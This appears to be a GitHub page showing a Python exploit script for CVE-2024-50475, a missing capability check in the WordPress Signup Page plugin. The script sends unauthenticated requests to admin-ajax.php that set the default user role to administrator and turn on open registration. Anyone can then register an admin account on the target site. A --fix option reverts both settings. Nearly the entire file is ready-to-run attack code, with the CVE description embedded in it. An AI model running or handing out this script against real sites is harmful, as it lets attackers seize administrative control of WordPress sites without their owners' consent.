-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2024-50475.py
101 lines (73 loc) · 4.11 KB
/
CVE-2024-50475.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
#!/usr/bin/env python3
import argparse
import requests
from getpass import getpass
from bs4 import BeautifulSoup
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## Exploit script by @RandomRobbieBF
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
session = requests.Session()
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
def undoadmin(url):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
payloads = [{"option_key":"default_role","action":"signup_page_update","signups":"subscriber"},{"option_key":"users_can_register","action":"signup_page_update","signups":"0"}]
main_url = f"{url}/wp-admin/admin-ajax.php"
for payload in payloads:
ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"},verify=False)
ajax_response.raise_for_status()
# Check if option set successfully
if ajax_response.status_code == 200:
print(f"Option set successfully: {main_url}")
else:
print(f"Failed to set option: {main_url}")
exit()
# Check if user registration is allowed
register_url = f"{url}/wp-login.php?action=register"
register_response = requests.get(register_url, headers={"User-Agent": user_agent},verify=False)
if "Registration confirmation will be emailed to you" in register_response.text:
print("Error: it looks like you can still register.")
exit()
else:
print("Fixed: You can not longer register")
def vulncheck(url):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
payloads = [{"option_key":"default_role","action":"signup_page_update","signups":"administrator"},{"option_key":"users_can_register","action":"signup_page_update","signups":"1"}]
main_url = f"{url}/wp-admin/admin-ajax.php"
for payload in payloads:
ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"Content-Type":"application/x-www-form-urlencoded"},verify=False)
ajax_response.raise_for_status()
# Check if option set successfully
if ajax_response.status_code == 200:
print(f"Option set successfully: {main_url}")
else:
print(f"Failed to set option: {main_url}")
exit()
# Check if user registration is allowed
register_url = f"{url}/wp-login.php?action=register"
register_response = requests.get(register_url, headers={"User-Agent": user_agent},verify=False)
if "Registration confirmation will be emailed to you" in register_response.text:
print("You can now register a user as an admin user. Remember to run --fix yes after you have registered to prevent others exploiting the site.")
exit()
else:
print("Registration is not avaliable for some reason could be a multisite?")
# Add the vulnerability description as a comment
DESCRIPTION = """
CVE-2024-50475 | Signup Page <= 1.0 - Unauthenticated Arbitrary Options Update
The Signup Page plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in all versions up to, and including, 1.0. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.
"""
# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-f", "--fix", help="Reset after Exploit")
args = parser.parse_args()
# Usage
if args.fix:
undoadmin(args.url)
else:
vulncheck(args.url)